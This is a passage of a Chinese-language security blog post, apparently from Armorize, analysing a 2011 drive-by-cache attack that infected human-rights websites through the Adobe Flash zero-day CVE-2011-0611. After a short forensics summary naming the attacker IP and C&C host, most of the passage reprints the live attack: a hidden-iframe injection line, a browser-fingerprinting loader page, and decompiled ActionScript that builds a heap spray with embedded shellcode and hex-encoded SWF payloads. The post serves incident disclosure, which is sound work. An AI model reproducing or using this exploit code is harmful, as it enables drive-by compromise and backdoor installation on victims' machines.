document.cookie = 'popad=true;path=/;expires=' + e.toGMTString();
document.write("<iframe frameborder=0 style='position: absolute; top:-9999px;left:-9999px' src='http://71.6.217.131/dir/AI/exploit.html' width=468 height=60 scrolling=no></iframe>");
}</b></pre><br />
該exploit code是由http://71.6.217.131/dir/AI/exploit.html所提供,完整的原始程式碼可以在部落格最後面看到,在此我們僅列出最重要的部份:<br />
<br />
<pre class="brush: html;"><b>var display="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+"<script src=newsvine.jp2><\/script>\r\n"+
"<object width=\"550\" height=\"400\">\r\n"+
"<param name=\"movie\" value=\"done.swf\">\r\n"+
"<embed src=\"display.swf\" width=\"550\" height=\"400\">\r\n"+
"<\/embed>\r\n"+
"<\/object>"
</b></pre><br />
編排之後:<br />
<br />
<pre class="brush: html;"><b><script type="text/javascript">
window.onerror=function(){return true;};
</script>
<script src=newsvine.jp2></script>
<object width="550" height="400">
<param name="movie" value="done.swf">
<embed src="display.swf" width="550" height="400"></embed>
</object>
</b></pre><br />
"display.swf"就是包含了exploit code的flash檔。完整的反編譯後的程式碼在部落格最後面可以看到。這一段碼則是當使用者的瀏覽器執行之後,就會將newsvine.jp2這隻惡意程式放進瀏覽器快取資料夾,(Drive-by Cache)。<br />
<br />
緊接著,display.swf被瀏覽器下載下來並且其中的ActionScript被執行,該ActionScript中內含shellcode <a href="http://www.adobe.com/support/security/bulletins/apsb11-07.html">CVE-2011-0611 Adobe Flash 0-day</a>,執行了之後則將先前存放在快取資料夾中的惡意程式跑起來。<br />
<br />
Newsvine.jp2這隻惡意程式會連回位於香港(jeentern.dyndns.org:80 182.237.3.105)的CNC伺服器。<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="detection-rates"><b>[4. 偵測率]</b></a><br />
<br />
這次的exploit code是包含在Flash的actionscript裡面。因為有別於傳統的Drive-by Download shellcode,此次攻擊所使用的技巧是Drive-by Cache,因此導致偵測率極低,當我們在第一時間把檔案上傳到Virustotal掃描時,沒有任何一加防毒軟體有偵測到此種惡意行為。<a href="http://www.virustotal.com/file-scan/report.html?id=2e498420acf149a2ea785bd798061d1e14b1b069e9abd83889da7e2f8d15c227-1302535834">submitted the swf file to VirusTotal</a>, <b><span style="color: red;">結果為 0 out of 42 antivirus vendors</span></b>。<br />
<a href="http://4.bp.blogspot.com/-hjYLVAZAVME/Tax-6R7sFkI/AAAAAAAACOQ/wesQf30qOIk/s1600/virustotal-drive-by-cache-1.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596987976625952322" src="http://4.bp.blogspot.com/-hjYLVAZAVME/Tax-6R7sFkI/AAAAAAAACOQ/wesQf30qOIk/s1600/virustotal-drive-by-cache-1.png" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
另外針對newsvine.jp2(swf.exe)這個惡意程式本身,<b><span style="color: red;">結果為 1/42 on VirusTotal</span></b> (<a href="http://www.virustotal.com/file-scan/report.html?id=408997d8e452a22649a789bddbe23ba3cf3f008db4a54771c1f731437b7c4eea-1302825095">report is here</a>)。僅有Microsoft偵測到這隻後門程式。<br />
<a href="http://4.bp.blogspot.com/-mZtTqgi3Y5A/Tax-6kxT4QI/AAAAAAAACOY/C_EqqLQplbk/s1600/virustotal-drive-by-cache-dropped-newsvine.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596987981682696450" src="http://4.bp.blogspot.com/-mZtTqgi3Y5A/Tax-6kxT4QI/AAAAAAAACOY/C_EqqLQplbk/s1600/virustotal-drive-by-cache-dropped-newsvine.png" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="forensics-summary"><b>[5. Forensics Summary]</b></a><br />
<br />
以下是我們目前所知的部份:<br />
<br />
1. 在大約一週前,特定的人權網站被感染(許多頁面),惡意連結目前仍然尚未移除<br />
2. 使用Drive-by Cache的技巧來進行攻擊<br />
3. 利用 <a href="http://www.adobe.com/support/security/bulletins/apsb11-07.html">CVE-2011-0611 Adobe Flash 0-day</a> 的漏洞<br />
4. Virustotal在第一時間的偵測率為 0/42 (SWF exploit code部份)、1/42(惡意程式本身)<br />
5. exploit code是由71.6.217.131來進行攻擊,這是一個位於聖地牙哥(San Diego)的網站,Hosted by <a href="http://cari.net/">Cari.Net</a>,我們相信他們的伺服器被感染來當作煤介<br />
6. newsvine.jp2這隻惡意程式(原始檔名為swf.exe)是透過Drive-by Cache的技巧來執行,他是一隻透過VB寫出來的後門程式,推斷是跟pincav同一類型,這隻惡意程式具有偽造的非法數位簽章,企圖偽冒在大陸非常熱門的迅雷P2P下載軟體<br />
7. newsfine.jp2會連回位於香港的CNC主機 (jeentern.dyndns.org:80)<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="complete-exploit-codes"><b>[6. 完整的程式碼]</b></a><br />
<br />
以下是此次Drive-by Cache事件中完整的程式碼 (exploit code), 如果你需要更多的資訊,請e-mail給我們:<br />
chris.hsiao在armorize點com<br />
nightcola.lin在armorize點com<br />
<br />
1. http://71.6.217.131/dir/AI/exploit.html:<br />
<br />
<pre class="brush: html;"><b><html>
<head>
<script type="text/javascript">
function getCookieVal(offset) {
var endstr = document.cookie.indexOf(";", offset);
if (endstr == -1) {
endstr = document.cookie.length;
}
return unescape(document.cookie.substring(offset, endstr));
}
function GetCookie(name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg) return getCookieVal(j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
function SetCookie(name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (2 < argc) ? argv[2] : null;
var path = (3 < argc) ? argv[3] : null;
var domain = (4 < argc) ? argv[4] : null;
var secure = (5 < argc) ? argv[5] : false;
document.cookie = name + "=" + escape(value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : "");
}
function DisplayInfo() {
var expdate = new Date();
var visit;
expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000));
if (!(visit = GetCookie("vis1t"))) visit = 0;
visit++;
SetCookie("vis1t", visit, expdate, "/", null, false);
return visit;
}
function code() {
var num = DisplayInfo();
if (num < 3) {
return 1;
} else {
return 0;
}
}
function user() {
var weekDay = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object classID=yg.dll#yg.e><\/object>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"March.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";
var display = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"display.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";
var Example = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object classID=yg.dll#yg.e><\/object>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"Birthday.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";
var info = navigator.userAgent.toLowerCase();
var win = (navigator.platform == "Win32") || (navigator.platform == "Windows");
var ck = code();
var January = info.indexOf('msie 8.0');
var February = info.indexOf('msie 7.0');
var April = info.indexOf('msie 6.0');
var June = info.indexOf("windows nt 5.1");
var August = info.indexOf("windows nt 6.1");
if (January > 0 && June > 0 && ck == 1) {
document.body.innerHTML = "xxxx" + weekDay;
}
if (June > 0 && ck == 1 && (February > 0 || April > 0)) {
document.body.innerHTML = "xxxx" + display;
}
if (January > 0 && August > 0 && ck == 1) {
document.body.innerHTML = "xxxx" + Example;
}
}
</script>
</head>
<body onload=user()>
</body>
</html>
</b></pre><br />
2. ActionScript中的exploit code, 由取得的swf檔反編譯:<br />
<pre class="brush: js;"><b>package ie_fla {
import flash.display. * ;
import flash.utils. * ;
dynamic public class MainTimeline extends MovieClip {
public
var s: Object;
public
var s2: Object;
public
var s3: Object;
public
var a: Object;
public
var t: Object;
public
var i: Object;
public
var r: ByteArray;
public
var ldr: Loader;
public
function MainTimeline() {
addFrameScript(0, this.frame1);
return;
} // end function
public
function hexToBin(param1: String): ByteArray {
var _loc_2: String;
var _loc_3: * = new ByteArray();
var _loc_4: * = param1.length;
var _loc_5: uint;
_loc_3.endian = Endian.LITTLE_ENDIAN;
while (_loc_5 < _loc_4) {
// label
_loc_2 = param1.charAt(_loc_5) + param1.charAt(_loc_5 + 1);
_loc_3.writeByte(parseInt(_loc_2, 16));
_loc_5 = _loc_5 + 2;
} // end while
return _loc_3;
} // end function
function frame1() {
this.s = new ByteArray();
this.s3 = new ByteArray();
this.a = new Array();
this.t = "4357530acc050000789c4d546d6c5365143eb7bdedfb765d29dd189dac2053f00345e3171f71b062bbeec3b63377b0a026c265bddd6decdaa6f7d61698a82466fb619610e20549f8322144134d10158d261287c9f8e10f31460da2268b4663628cc1080c37cf79efb5f5fe787bee799ef39cf39c7b7b6be0d901103c01d02e413c047875bb4f7b00ac66f0007b757abc95cde1b1a8e5a80b92321eed30d9063ed8028f410ce2d00309e8853ee887935321c86859b592374102790db8e0b0643501db7ebebf8f9dee7effdc4e2c0778cd85e4a885ea4bcd923fb90b93cd3021813b8c8728f84def4cb32587be3f6317d4f3076eae5bc60aee8b3fd585dac00a6033bcdce2e4947c7d216c794196641797d27d5478e58594ca6e7bf19d63762179f985981f00a13cf1e05af6f7879f5fb251e50ed494ddb2c44812455c0a0d3b75e2c9bd62d856a05b37627e0a16868a5ce49bc062206a384448377ee3be28fbc8f3c527b6aee502ee567aa966e781c3f78b1abf6d1c21592260f5feb9b8007cf004b90ee3901bc5906c15bb8b5dbb7ced6b47cc0f8d016564f52d10cbef0ead67576ffe3e53dfd0d579127793f8db7cc31a212ec366cb07dc63afcc1bed425e45740926d73ecefe387be95dbb3e828e3863190c0785a5b472bb8b9d79ebbb7f6c3ca5842329929ed9f65945487b40096f8ae0749c739fbd8c26bc47ebfe3476d92076373d7f3ce8d8b73a81373b3c1eb08345dcc3838dd043d32d0cd2c4ff3149e4e5edaf3c22441860034c4cac1ed79d04f55b3cc5c99eeb6e580e582bbcca12e7446dffe1dbbdce3353c2e42baf5f8cb28387d6398f6a105b9ec77714919335efbdec9989eb5fda4857b48bb29b8efcf928fb540b5c70f69452447afad6e7d7b3ae1ff7cfd4d3d4ed67ffb96d8e5d5c97581972073ede5763efc55e9a70debab030317be5e80ac10d805dfce6a97d03ce7fc4d9f5d9a737ef1219898a52b6813722dea7d8f0ecf553f5073f2b59a6ed9a87788bbdb85646205fc2dbf8d2c682c38db0bd11ded20897d9328b7907eff05218c0cb86237cb977aed3171df8a625e564b0f785791ab4f9af749b183428dead5f3b26bb593632d92dbe2571697295b40286cc72ae300a79ad306aea30a2abe55831a36d31215b2e8ec59c5b91c7dc886a68b055ab998962794c35c1c8ed416c47b65280e16733157d54d1c6f46cf501a352ae96abe3865eff1e8d6ae610917b3355fd7f70b55aa69b68f51e6c8e1cd2eea9995ac1843d55a3fa90cd74c0b8ba9b7e12c58299cc19a63d484ecb6720a5d2ec654d35b59eb192b93b557c2ea7c5f2b912987ace807e43a9140a64d3d0cc14f94916d5ccb05a3684ac56a26ab4b612560a8771d481116c932b5490db820b0d8175a734a75fdef8d556e3e160227a2c4bd9d20d88e2caff0522695d54";
this.i = 0;
while (this.i < 1024) {
// label
this.s3.writeByte(13);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.i = 0;
while (this.i < 1023) {
// label
this.s.writeBytes(this.s3, 0, this.s3.length);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.s.writeInt(2425393296);
this.s.writeInt(2425393296);
this.s.writeInt(3326443264);
this.s.writeInt(1620086928);
this.s.writeInt(3943717707);
this.s.writeInt(868837049);
this.s.writeInt(2231533620);
this.s.writeInt(199418618);
this.s.writeInt(3943033067);
this.s.writeInt(4294967051);
this.s.writeInt(3118523106);
this.s.writeInt(3184599686);
this.s.writeInt(1137894114);
this.s.writeInt(3798573806);
this.s.writeInt(1772287593);
this.s.writeInt(3798590057);
this.s.writeInt(2331142421);
this.s.writeInt(2296888074);
this.s.writeInt(350479074);
this.s.writeInt(1912609418);
this.s.writeInt(3520127714);
this.s.writeInt(2327286151);
this.s.writeInt(2427873764);
this.s.writeInt(179692514);
this.s.writeInt(3798534792);
this.s.writeInt(3820685877);
this.s.writeInt(3823297024);
this.s.writeInt(462065361);
this.s.writeInt(3504507537);
this.s.writeInt(2324139702);
this.s.writeInt(1776552667);
this.s.writeInt(3823297129);
this.s.writeInt(176743355);
this.s.writeInt(173794274);
this.s.writeInt(3791657833);
this.s.writeInt(912330422);
this.s.writeInt(1763576316);
this.s.writeInt(3138065634);
this.s.writeInt(3806509067);
this.s.writeInt(534962914);
this.s.writeInt(3112755848);
this.s.writeInt(3803426993);
this.s.writeInt(2296520116);
this.s.writeInt(4195031010);
this.s.writeInt(3806464575);
this.s.writeInt(488447361);
this.s.writeInt(2407976071);
this.s.writeInt(2592588493);
this.s.writeInt(2713887917);
this.s.writeInt(2965556656);
this.s.writeInt(3267413943);
this.s.writeInt(2980556978);
this.s.writeInt(2964169899);
this.s.writeInt(2930231230);
this.s.writeInt(2928509315);
this.s.writeInt(2395124103);
this.s.writeInt(2526448524);
this.s.writeInt(2240921270);
this.s.writeInt(2274333325);
this.s.writeInt(2424541339);
this.s.writeInt(3266022550);
this.s.writeInt(2274397319);
this.s.writeInt(2529338507);
this.s.writeInt(2391249342);
this.s.writeInt(3233990539);
this.s.writeInt(3266030786);
this.s.writeInt(3398207381);
this.s.writeInt(2442431372);
this.s.writeInt(2278083720);
this.s.writeInt(2463157186);
this.s.writeInt(2796405450);
this.s.writeInt(3397488518);
this.s.writeInt(3431438983);
this.s.writeInt(3267415425);
this.s.writeInt(3263596430);
this.s.writeInt(3268252098);
this.s.writeInt(3348531087);
this.s.writeInt(2462563985);
this.s.writeInt(2491517581);
this.s.writeInt(2442579079);
this.s.writeInt(2592588484);
this.s.writeInt(3301081485);
this.s.writeInt(2459681472);
this.s.writeInt(3347824834);
this.s.writeInt(3348531087);
this.s.writeInt(2462563985);
this.s.writeInt(2491517581);
this.s.writeInt(2442579079);
this.s.writeInt(2592588493);
this.s.writeInt(2613232836);
this.s.writeInt(3263270790);
this.s.writeInt(3431438983);
this.s.writeInt(3268248002);
this.s.writeInt(2442560400);
this.s.writeInt(2529347478);
this.s.writeInt(2274333383);
this.s.writeInt(3197211777);
this.s.writeInt(2324533654);
this.s.writeInt(3431438983);
this.s.writeInt(3234581474);
this.s.writeInt(182918429);
this.s.writeInt(495030150);
this.s.writeInt(3431438983);
this.s.writeInt(3792313372);
this.s.writeInt(488476050);
this.s.writeInt(2274157153);
this.s.writeInt(646349673);
this.s.writeInt(1030350534);
this.s.writeInt(1629941345);
this.s.writeInt(183835906);
this.s.writeInt(1658456726);
this.s.writeInt(3898792459);
this.s.writeInt(2531746522);
this.s.writeInt(160953187);
this.s.writeInt(2598859378);
this.s.writeInt(1920112362);
this.s.writeInt(1763555177);
this.s.writeInt(242197223);
this.s.writeInt(486673117);
this.s.writeInt(3806519841);
this.s.writeInt(1658456726);
this.s.writeInt(3898792459);
this.s.writeInt(2531746522);
this.s.writeInt(160953187);
this.s.writeInt(2598859378);
this.s.writeInt(1920112130);
this.s.writeInt(2330650850);
this.s.writeInt(3798967015);
this.s.writeInt(486673141);
this.s.writeInt(3806519841);
this.s.writeInt(183755490);
this.s.writeInt(3797611491);
this.s.writeInt(3865190638);
this.s.writeInt(3792298170);
this.s.writeInt(554310429);
this.s.writeInt(488487204);
this.s.writeInt(3847908285);
this.s.writeInt(3817088421);
this.s.writeInt(3877437985);
this.s.writeInt(2976464561);
this.s.writeInt(2292353762);
this.s.writeInt(4074955445);
this.s.writeInt(1772416522);
this.s.writeInt(2585599261);
this.s.writeInt(3122770868);
this.s.writeInt(1771560553);
this.s.writeInt(2529991393);
this.s.writeInt(397699476);
this.s.writeInt(3269531601);
this.s.writeInt(732668751);
this.s.writeInt(3777483065);
this.s.writeInt(3982291672);
this.s.writeInt(882305571);
this.s.writeInt(702931256);
this.s.writeInt(2718503897);
this.s.writeInt(4254533052);
this.s.writeInt(1773979361);
this.s.writeInt(1065642478);
this.s.writeInt(2842279166);
this.s.writeInt(3779029478);
this.s.writeInt(1776363337);
this.s.writeInt(3166380298);
this.s.writeInt(1109335325);
this.s.writeInt(3499521006);
this.s.writeInt(1732070745);
this.s.writeInt(2171286445);
this.s.writeInt(4232480269);
this.s.writeInt(3045388061);
this.s.writeInt(2062086682);
this.s.writeInt(3123304899);
this.s.writeInt(3806520034);
trace(this.s.length);
this.i = 0;
while (this.i < 176) {
// label
this.s2 = new ByteArray();
this.s2.writeBytes(this.s, 0, this.s.length);
trace(this.s2.length);
this.a.push(this.s2);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.r = this.hexToBin(this.t);
this.ldr = new Loader();
this.ldr.loadBytes(this.r);
stop();
return;
} // end function
}
}
//==============================================
package ie8_fla {
import flash.display. * ;
import flash.system. * ;
import flash.utils. * ;
dynamic public class MainTimeline extends MovieClip {
public
var s: Object;
public
var s2: Object;
public
var s3: Object;
public
var a: Object;
public
var i: Object;
public
var j: Object;
public
var sc_len: uint;
public
var t: Object;
public
var r_cn: ByteArray;
public
var ldr_cn: Loader;
public
var r: ByteArray;
public
var ldr: Loader;
public
var r_jp: ByteArray;
public
var ldr_jp: Loader;
public
function MainTimeline() {
addFrameScript(0, this.frame1);
return;
} // end function
public
function hexToBin(param1: String): ByteArray {
var _loc_2: String;
var _loc_3: * = new ByteArray();
var _loc_4: * = param1.length;
var _loc_5: uint;
_loc_3.endian = Endian.LITTLE_ENDIAN;
while (_loc_5 < _loc_4) {
// label
_loc_2 = param1.charAt(_loc_5) + param1.charAt(_loc_5 + 1);
_loc_3.writeByte(parseInt(_loc_2, 16));
_loc_5 = _loc_5 + 2;
} // end while
return _loc_3;
} // end function
function frame1() {
this.s = new ByteArray();
this.s2 = new ByteArray();
this.a = new Array();
this.sc_len = 0;
this.t = "4357530a22060000789c5d547d4c5b55143faf5ff742617c38e806ad01743a9d0a861931822b520a685bb4632c6e0a2bf4d136a52de97bf5019b1fdb7423d982c69017e6321d31e8a2c9dcdc8c2133e81fc62d0edd747f90cc8f3847164de6b268a2532778cfbd0f4abc49efbbeffcceef9cdff9ddf40d82b51ba0e030c02a093c45c0d606f3bf56003d0fac40761fed71910beff7b856141f32c12716b695c0483150688447a1093cd00c5e688156182d809eb41c8a830496bbc1045b253d17c8e5df6ab61167feb937b73126c00113dc09eebd12981d6ce319d393431269dcb2675e64f0f801eca2e7b3526c99f94e91fbd98243b78145b29828e77eb3beaa9adc7bf6fbf3821b68d599e44bb7556bbe1e16c803d4fc25128f01226dc1da4e8ee440f00e0cccfc5852c30385d8cd62b648049bb1f2a620e266f682cf9fbf3af30ccfcb05bb4e802751400527eabeee20bed3f7bd27143875135033e736406725e7d8a1850fcc208bf40442c726bbda38b412705a071358c5fbcc1df921c08122d0ed9055636119be05b6c10256313f82adafa4bc8f91d5af4e7d285aeb3940adc22a9b1bf1b70267b793a78faf7f49e0f58cbe9f6b3e54fdd7ada4e7bcedd2a266029490303bb6a3887307eb860d979c7eccf78fbf11271f444263223fe870fa8318df3f3ef61c5122f15dc6cd3560d0f7cbcb0f9213a5c367168bdb81529a232ccb6de006d9034c4b1de89540f30c80e68bc30a6aa505d9a315055d898cdfce05497895ed0b5c654769a48a07f3f9e48b75b8867f4edfe32296ba0b3f2dbb94c2518ade98ee824a6ec2e074d70b646fe3c48b4bee71ef2c12a541072678bb6e6c225313e45d91d0ce5aff09dcd88b3b4ed59235bb3d3386b16ed4f3c7ac678d71a7f5ee7a748805eda33b938695f54ea436bd32be997c3c103922a8c2c79b0f1cdd40cc5f3cf9a9e1a313a9f315659b8cf9fc4111fafd6a69cca826885b3e3fdc4a261feafe6891e8c7b4e877279fe26936bc2accdb79592b26cf3b477e5dde3530672e22c7cb6f5e5b228bb9e33766c2648cd41e5cfac75e97f43dc21d5a448b85d1b71004e94a5a424bb3d7e5c81e57658fabb3c73251a69096d35cdbd6cdd77bf12760272db7e5196b3162fd7f84a9d93e8f2a13b3b38f93d7d6ae3d695c1f0b35ee7b3b4dde611bff543d2cbd5e215dad99ac993bd57c6d7a6a6862ddb71777b58fb824176c54d3b16404fae564448d426f34946e4a85e54615fad2a94493f1cae32cd61b52e40ae89007556f2a9d08a9a0c48619d8dd974942673c9c8946827222daa7ddaf64d25a5adba1448dcf60445637626a4b588b2e03352d8d2f6e6d1debcd72b072f3a02a275518d614ad56641aa02734840f6f2aa9fa628a2a64c4e4fe30f843289d3552e5e6c4803ae44f3d1b939bfa6303a046630ab429c14c3289532ab2eac7717ca950b833945678597900d9ac6a2c9991a10267040f2b05be62e670d9dfe0669efe07c8b77774";
trace("if");
if (Capabilities.language.toLowerCase() == "zh-cn") {
this.s.writeInt(2425393296);
this.s.writeInt(2425393296);
this.s.writeInt(202150032);
this.s.writeInt(3943717707);
this.s.writeInt(868837049);
this.s.writeInt(1459781684);
this.s.writeInt(199418618);
this.s.writeInt(3943033067);
this.s.writeInt(4294967051);
this.s.writeInt(3554730722);
this.s.writeInt(3184599686);
this.s.writeInt(1137894114);
this.s.writeInt(3798573806);
this.s.writeInt(1772287593);
this.s.writeInt(3798590057);
this.s.writeInt(2331142421);
this.s.writeInt(2296888074);
this.s.writeInt(786686690);
this.s.writeInt(1912609418);
this.s.writeInt(2396115170);
this.s.writeInt(2324793991);
this.s.writeInt(2394319332);
this.s.writeInt(181396450);
this.s.writeInt(3798534792);
this.s.writeInt(3820685903);
this.s.writeInt(3823297024);
this.s.writeInt(459880033);
this.s.writeInt(246835486);
this.s.writeInt(167557899);
this.s.writeInt(350413538);
this.s.writeInt(3087736802);
this.s.writeInt(3806509448);
this.s.writeInt(3800621747);
this.s.writeInt(2964424930);
this.s.writeInt(498398731);
this.s.writeInt(400745186);
this.s.writeInt(171908381);
this.s.writeInt(495030150);
this.s.writeInt(3431438983);
this.s.writeInt(3268256194);
this.s.writeInt(2762846402);
this.s.writeInt(3450913472);
this.s.writeInt(3350704551);
this.s.writeInt(2964500653);
this.s.writeInt(2762714791);
this.s.writeInt(3351162509);
this.s.writeInt(2172882626);
this.s.writeInt(2978453142);
this.s.writeInt(2341242257);
this.s.writeInt(3199633295);
this.s.writeInt(2458751107);
this.s.writeInt(2426127019);
this.s.writeInt(2358675344);
this.s.writeInt(2357696194);
this.s.writeInt(2760609415);
this.s.writeInt(2445197506);
this.s.writeInt(3347825323);
this.s.writeInt(2898446988);
this.s.writeInt(2274726292);
this.s.writeInt(2341242824);
this.s.writeInt(3431502544);
this.s.writeInt(3418531501);
this.s.writeInt(3268070017);
this.s.writeInt(2407976071);
this.s.writeInt(2592588480);
this.s.writeInt(3447833222);
this.s.writeInt(2274280141);
this.s.writeInt(2445461398);
this.s.writeInt(2274333383);
this.s.writeInt(3197211777);
this.s.writeInt(2324533654);
this.s.writeInt(3431438983);
this.s.writeInt(3267675330);
this.s.writeInt(2173538971);
this.s.writeInt(3267413899);
this.s.writeInt(3233990550);
this.s.writeInt(2274333383);
this.s.writeInt(3197211777);
this.s.writeInt(2324533654);
this.s.writeInt(3431438983);
this.s.writeInt(3268254658);
this.s.writeInt(3301229185);
this.s.writeInt(2407976071);
this.s.writeInt(2592588493);
this.s.writeInt(2177012118);
this.s.writeInt(2207291074);
this.s.writeInt(3348531087);
this.s.writeInt(2462563985);
this.s.writeInt(2491517581);
this.s.writeInt(2442579079);
this.s.writeInt(2592587979);
this.s.writeInt(3420588775);
this.s.writeInt(488447361);
this.s.writeInt(2407976071);
this.s.writeInt(2592596490);
this.s.writeInt(471604509);
this.s.writeInt(2375190412);
this.s.writeInt(3800621597);
this.s.writeInt(3035259610);
this.s.writeInt(177662050);
this.s.writeInt(3658192615);
this.s.writeInt(1658456471);
this.s.writeInt(4083391207);
this.s.writeInt(1920103026);
this.s.writeInt(2531944733);
this.s.writeInt(3077115503);
this.s.writeInt(2733055234);
this.s.writeInt(182313698);
this.s.writeInt(3793838810);
this.s.writeInt(177662050);
this.s.writeInt(3658192615);
this.s.writeInt(1658456471);
this.s.writeInt(4083391207);
this.s.writeInt(1920103026);
this.s.writeInt(2516749034);
this.s.writeInt(3907183215);
this.s.writeInt(2733055234);
this.s.writeInt(183886562);
this.s.writeInt(3793816307);
this.s.writeInt(3806519898);
this.s.writeInt(4091799138);
this.s.writeInt(552526345);
this.s.writeInt(3770294538);
this.s.writeInt(454892829);
this.s.writeInt(3106202970);
this.s.writeInt(1807606660);
this.s.writeInt(631629597);
this.s.writeInt(35762537);
this.s.writeInt(1051822242);
this.s.writeInt(2330129122);
this.s.writeInt(3803539876);
this.s.writeInt(3993672221);
this.s.writeInt(488487457);
this.s.writeInt(3014945175);
this.s.writeInt(3731461836);
this.s.writeInt(2598442932);
this.s.writeInt(1771356897);
this.s.writeInt(399584171);
this.s.writeInt(2739921191);
this.s.writeInt(3510234460);
this.s.writeInt(4074255510);
this.s.writeInt(3928173029);
this.s.writeInt(3778585097);
this.s.writeInt(333053335);
this.s.writeInt(96233916);
this.s.writeInt(3336650628);
this.s.writeInt(1777248617);
this.s.writeInt(3170820415);
this.s.writeInt(1776708065);
this.s.writeInt(659143867);
this.s.writeInt(554313759);
this.s.writeInt(488493206);
this.s.writeInt(1945003837);
this.s.writeInt(1297711467);
this.s.writeInt(867040326);
this.s.writeInt(2249045380);
this.s.writeInt(4011702825);
this.s.writeInt(3653493474);
this.s.writeInt(3806461952);
this.sc_len = this.s.length;
trace("cn");
trace(this.s.length);
this.j = 3084 - this.sc_len;
this.i = 0;
while (this.i < this.j) {
// label
this.s.writeByte(144);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.s.endian = Endian.LITTLE_ENDIAN;
this.s.writeInt(2008988467);
this.s.writeInt(3435973836);
this.s.writeInt(2008964821);
this.s.writeInt(3435973836);
this.s.writeInt(2008944920);
this.s.writeInt(2009023683);
this.s.writeInt(3435973836);
this.s.writeInt(2009016856);
this.s.writeInt(202113024);
this.s.writeInt(202113024);
this.s.writeInt(8192);
this.s.writeInt(64);
this.s.writeInt(202116560);
this.s.writeInt(0);
this.s.writeInt(202116164);
this.s.writeInt(0);
this.s.writeInt(0);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.i = 0;
while (this.i < this.sc_len) {
// label
this.s.writeInt(1676697940);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.s.writeInt(1676697940);
this.s.writeInt(1676697940);
this.s.writeInt(1676680900);
this.s.endian = Endian.BIG_ENDIAN;
this.j = 65536 - this.s.length;
this.i = 0;
while (this.i < this.j / 4) {
// label
this.s.writeInt(305419896);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.i = 0;
while (this.i < 16) {
// label
this.s2.writeBytes(this.s, 0, this.s.length);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
trace(this.s2.length);
this.i = 0;
while (this.i < 176) {
// label
this.s3 = new ByteArray();
this.s3.writeBytes(this.s2, 0, this.s2.length);
trace(this.s3.length);
this.a.push(this.s3);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.r_cn = this.hexToBin(this.t);
this.ldr_cn = new Loader();
this.ldr_cn.loadBytes(this.r_cn);
} // end if
if (Capabilities.language.toLowerCase() == "en") {
this.s.writeInt(2425393296);
this.s.writeInt(2425393296);
this.s.writeInt(202150032);
this.s.writeInt(3943717707);
this.s.writeInt(868837049);
this.s.writeInt(1459781684);
this.s.writeInt(199418618);
this.s.writeInt(3943033067);
this.s.writeInt(4294967051);
this.s.writeInt(3554730722);
this.s.writeInt(3184599686);
this.s.writeInt(1137894114);
this.s.writeInt(3798573806);
this.s.writeInt(1772287593);
this.s.writeInt(3798590057);
this.s.writeInt(2331142421);
this.s.writeInt(2296888074);
this.s.writeInt(786686690);
this.s.writeInt(1912609418);
this.s.writeInt(2396115170);
this.s.writeInt(2324793991);
this.s.writeInt(2394319332);
this.s.writeInt(181396450);
this.s.writeInt(3798534792);
this.s.writeInt(3820685903);
this.s.writeInt(3823297024);
this.s.writeInt(459880033);
this.s.writeInt(246835486);
this.s.writeInt(167557899);
this.s.writeInt(350413538);
this.s.writeInt(3087736802);
this.s.writeInt(3806509448);
this.s.writeInt(3800621747);
this.s.writeInt(2964424930);
this.s.writeInt(498398731);
this.s.writeInt(400745186);
this.s.writeInt(171908381);
this.s.writeInt(495030150);
this.s.writeInt(3431438983);
this.s.writeInt(3268256194);
this.s.writeInt(2762846402);
this.s.writeInt(3450913472);
